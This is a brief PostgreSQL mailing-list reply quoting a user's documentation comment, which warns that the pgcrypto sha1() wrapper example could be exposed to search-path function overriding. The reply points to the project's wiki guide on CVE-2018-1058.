On Tuesday, August 17, 2021, PG Doc comments form <nore...@postgresql.org> wrote:
> The following documentation comment has been logged on the website: > > Page: https://www.postgresql.org/docs/13/pgcrypto.html > Description: > > Hi, > in "F.25.1.1. digest()" you suggest: > > CREATE OR REPLACE FUNCTION sha1(bytea) returns text AS $$ > SELECT encode(digest($1, 'sha1'), 'hex') > $$ LANGUAGE SQL STRICT IMMUTABLE; > > While this is a great example, it may expose a database app to > vulnerabilities if the attacker succeeds in overriding the function > sha1(...) in the app's user context (schema) > You should read this: https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path David J.
